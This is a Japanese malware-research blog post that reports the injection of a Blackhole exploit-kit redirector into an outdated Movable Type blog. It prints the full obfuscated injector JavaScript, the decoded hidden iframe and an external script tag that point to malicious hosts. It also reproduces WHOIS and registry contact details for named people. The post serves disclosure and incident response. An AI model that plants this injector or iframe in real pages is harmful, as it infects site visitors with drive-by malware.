火曜日, 3月 06, 2012

#OCJP-024: 脆弱性ありMT(Moveable Type)ブログ日本語版のサイト(germa.brand-crea.com / 210.236.167.168)がBlackhole Exploit経由トロイJScript/IFRAMEマルウェアに感染されました。 【対応済み】


今回、古い日本語版Moveable Typeブログがハッキングされて、マルウェアスクリプトがインジェクトされた事件です。本件には日本にあるお客様はバーション「Movable Type 3.21-ja」を使っています。本バーションに付いて沢山リモート攻撃の脆弱性が入っていますので、詰り下記の情報ですね↓
CVE-2012-0317 by CSRF to Remotely Hijack Auth to Modify Data (affected: Medium)
CVE-2012-0318 Remote Inject arbitrary web script/HTML (affected: High)
CVE-2012-0319 Leveraging file-upload feature⇒OS Command Injection (affected: High)
CVE-2012-0320 Sessions Hijacking (affected: None)
CVE-2012-1262 Injection of arbitrary web script/HTML via dbuser parameter (affected: High)
↑恐らくハッカーが脆弱性情報を使いハッキングしたかと思われます。
実はもう一つ可能性もあります、FTPクライアントのアカウント情報が盗まれてしまいたから、ハッカーがリモートでウェブサーバにアクセスして、色んなマルウェアコードを書いちゃいましたと。さて、どんなマルウェアかと下記と説明となります。

■下記のホスト↓

germa.brand-crea.com / 210.236.167.168

■下記のURL↓

hxxp://germa.brand-crea.com/ hxxp://germa.brand-crea.com/index.html

■下記のマルウェアを発見しました↓

アファイル  :「などなど.html」又は「などなど.js」又は「などなど.php」 マルウェア種類: JavaScript Obfuscated Trojan IFRAME Redirector マルウェア名 : Trojan/JS.Iframe、JS:Redirector、VirTool.JS/Obfuscator、JS.Obfus マルウェア機能: マルウェアサイトへIFRAMEでREDIRECTされて、マルウェアを感染させる 説明     : HTMLの中にタグの所にマルウェアJSコードがインジェクトされた 感染仕組みは1)サービスの脆弱性 2)FTPアカウントを盗まれた 本件のサンプルではBLACKHOLE EXPLOIT PACKのURLへ飛ばされると。

■ウイルススキャン結果↓

MD5: 89d3151d1188d7a7c543254cb2cc1765 File size: 32.3 KB ( 33046 bytes ) File name: index.html File type: HTML Detection ratio: 32 / 43 Analysis date: 2012-03-05 15:05:26 UTC Result: [CLICK]

■ダウンロード証拠↓

--01:05:22-- hxxp://germa.brand-crea.com/ => `index.html.1' Resolving germa.brand-crea.com... 210.236.167.168 Connecting to germa.brand-crea.com|210.236.167.168|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 33,046 (32K) [text/html] 100%[====================================>] 33,046 --.--K/s 01:05:22 (519.56 KB/s) - `index.html.1' saved [33046/33046]

■マルウェア調査に付いて↓

本件の感染されたHTMLファイルに沢山JAVASCRIPTコードがはいっています、間違いなくインジェックトされた コードです。殆どSEOの関係スクリプトとハッカーの宣伝ですが、全部放っておいて、 下記のマルウェアJavaScriptコードを発見しました↓
<script> var b={a:{b:{b:'~',c:'.',a:'^'},c:{b:'%',c:218915,a:1154%256},a:{b:1^0,c:55,a:' ijl'}},b:{b:{b:function(a){try{var c=document['\x63\x72\x65\x61\x74\x65\x45\x6c \x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');c['\x74\x79\x70\x65']='\x68\x69\ x64\x64\x65\x6e';c['\x76\x61\x6c\x75\x65']=a;c['\x69\x64']='\x6a';document['\x6 2\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](c);}catch(a){re turn false;} return true;},c:function(){try{var c=document['\x67\x65\x74\x45\x6c\x65\x6d\x65 \x6e\x74\x42\x79\x49\x64']('\x6a');}catch(c){return false;} return c.value;},a:function(){var c=b.b.b.b(b.c.b.b('.75.67.67.63.3a.2f.2f.31.3 9.33.2e.31.30.35.2e.32.34.30.2e.31.38.36.2f.6e.71.7a.76.61.2e.63.75.63.3f.66.75 .61.6e.7a.72.3d.65.72.70.6e.67.63.70.75.6e'));var a=(c)?b.b.b.c():false;return a;}},c:{b:function(){var c=b.b.b.a('trashtext');var a=(c)?c:'trashtext';return a||false;},c:function(){var c=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6 d\x65\x6e\x74']('\x6c');c['\x77\x69\x64\x74\x68']='0.1em';c['\x68\x65\x69\x67\x 68\x74']='0.2em';c['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';c ['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';c['\x69\x6e\x6e \x65\x72\x48\x54\x4d\x4c']='\x6c';c['\x69\x64']='\x6c';document['\x62\x6f\x64\x 79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](c);},a:function(){var c=b. b.a.a(b.b.c.c());c=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x 49\x64']('\x6c');var a=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x 6e\x74']('\x69\x66\x72\x61\x6d\x65');a['\x68\x65\x69\x67\x68\x74']=a['\x77\x69\ x64\x74\x68'];a['\x73\x72\x63']=b.b.a.b(b.b.c.b());try{c['\x61\x70\x70\x65\x6e\ x64\x43\x68\x69\x6c\x64'](a);}catch(a){}}},a:{b:function(c){return c['replace'] (/[A-Za-z]/g,function(a){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6 f\x64\x65']((((a=a.charCodeAt(0))&223)-52)%26+(a&32)+65);});},c:function(c){ret urn b.b.a.b(c)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},a:function(c){try {c();}catch(c){}}}},c:{b:{b:function(c){c=c['replace'](/[.]/g,'%');return windo w['\x75\x6e\x65\x73\x63\x61\x70\x65'](c);},c:'90',a:'70'},c:{b:'19',c:'25',a:'4 6'},a:{b:'54',c:'23',a:'92'}}} b.b.c.a();</script>
↑上記をdecodeしたら、ひとつの結果の中にIFRAMEのコードを発見しました↓
<iframe src="hxxp://zolotozapas.in/main.php?page=645e0e39aea7d097" width=0 height=0 frameborder=0></iframe>
↑これは本件の感染のポイントです。(1)にしましょう。 もう一つはHTMLの一番したにある↓
<script type="text/javascript" src="hxxp://addonrock.ru/Keystroke.js"> </script><!--59f106a2902bec021bb4010ed92d8669-->
↑これもポイントです。(2)にしますね。 (1)に付いて、下記のURLは前回のの事件で発見したように(#OCJP-022)
hxxp://zolotozapas.in/main.php?page=645e0e39aea7d097 ^^^^^^^^^ ^^^^^^^^^^^^^^^^ ExploitKit UI の 感染ID番号    ←です。
↑まさに本パターンを見たらBLACKHOLE EXPLOIT PACKっぽいです。 マルウェア元のサイトが現在停止されたので、詳しく確認が出来ませんでした。 (2)に付いて、昨年6月によく流行った「.htaccess」の感染シグネチャーですね。 様は、なんとか.jsファイルで、ロシアにある良く分からないドメインです。 本件の感染されたURLをクリックしたらFirefoxブラウザですと既にブロックされている状況です↓ もし無理やり開いたら、現在は本件の感染されたページはこんな感じとなります↓ ↑私はNO-SCRIPTのプラグインをずっとつかっていますので、 マルウェアのコードはブログのページの上に入ってますね。 NO-SCRIPTが無いブラウザーですと裏でマルウェアサイトとハッカーの宣伝ページに連絡している状況↓
[script] http://tatayoung.fanfusion.org/cutenews/robots.php [script] hxxp://addonrock.ru/Keystroke.js [iframe] hxxp://analytics.rebel5.com/stat.js [iframe] hxxp://46.4.163.208/counter.js [iframe] hxxp://zolotozapas.in/main.php?page=645e0e39aea7d097
↑但し、マルウェアのホスト「zolotozapas.in」が停止されている状況なので、現在マルウェア感染になりません。 下記様なメッセージが出てくるかも知れないので、只の悪戯宣伝ですので大丈夫です↓
※もし本件のマルウェアスクリプトを詳しく見たいならVirusTotalのレポートに書きました

■念のために下記はサイトの連絡先情報(報告手続きの為)↓

※ドメインに付いて↓
Domain Name: BRAND-CREA.COM Registrar: ONLINENIC, INC. Whois Server: whois.onlinenic.com Referral URL: http://www.OnlineNIC.com Name Server: DAYAN.GNA.NE.JP Name Server: DAYAN.MZSS.NET Status: ok Updated Date: 20-apr-2011 Creation Date: 19-apr-2004 Expiration Date: 19-apr-2012 Registrant: crea risarisa(at)mte.biglobe.ne.jp +81.663045054 +81.663045054 Tomiya bldg 3F, 3-13-15, Nishinakajima, Yodogawa-ku, Osaka,Osaka,JP 532-0011 Domain servers in listed order: dayan.gna.ne.jp dayan.mzss.net Administrator: Future Spirits Co.,Ltd. nic-apply@future-s.com +81.753263700 +81.753267400 KRP#6, 93, Awata-cho, Chudouji Shimogyo-ku, Kyoto,Kyoto,JP 600-8815 Registration Service Provider: name: G.N.A Inc tel: +81.592950123 fax: +81.592950124 web:http://www.gna.ne.jp
※IPに付いて↓
a. [Network Number] 210.236.167.128/25 b. [Network Name] ISMARU g. [Organization] ishimaruhideki m. [Administrative Contact] YT2812JP n. [Technical Contact] YT2812JP a. [JPNICハンドル] YT2812JP b. [氏名] 谷口 康弘 c. [Last, First] Taniguchi, Yasuhiro d. [電子メイル] taniguti@ztv.co.jp f. [組織名] 株式会社 ZTV g. [Organization] ZTV CO.,LTD o. [電話番号] 059-236-5111 p. [FAX番号] 059-236-5112 y. [通知アドレス] forjpnic@ztv.co.jp [最終更新] 2004/06/09 13:53:01(JST) forjpnic@ztv.co.jp
※ネットワーク図↓
----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック

1 件のコメント:

  1. 本件のケースの対応は終了となります。
    マルウェアファイルがs駆除されております。
    ご協力頂きまことに有難うございます。

    下記は証拠です↓
    --2012-03-08 03:06:19-- http://germa.brand-crea.com/index.html
    Resolving germa.brand-crea.com (germa.brand-crea.com)... 210.236.167.168
    Connecting to germa.brand-crea.com (germa.brand-crea.com)|210.236.167.168|:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2012-03-08 03:06:19 ERROR 404: Not Found.

    返信削除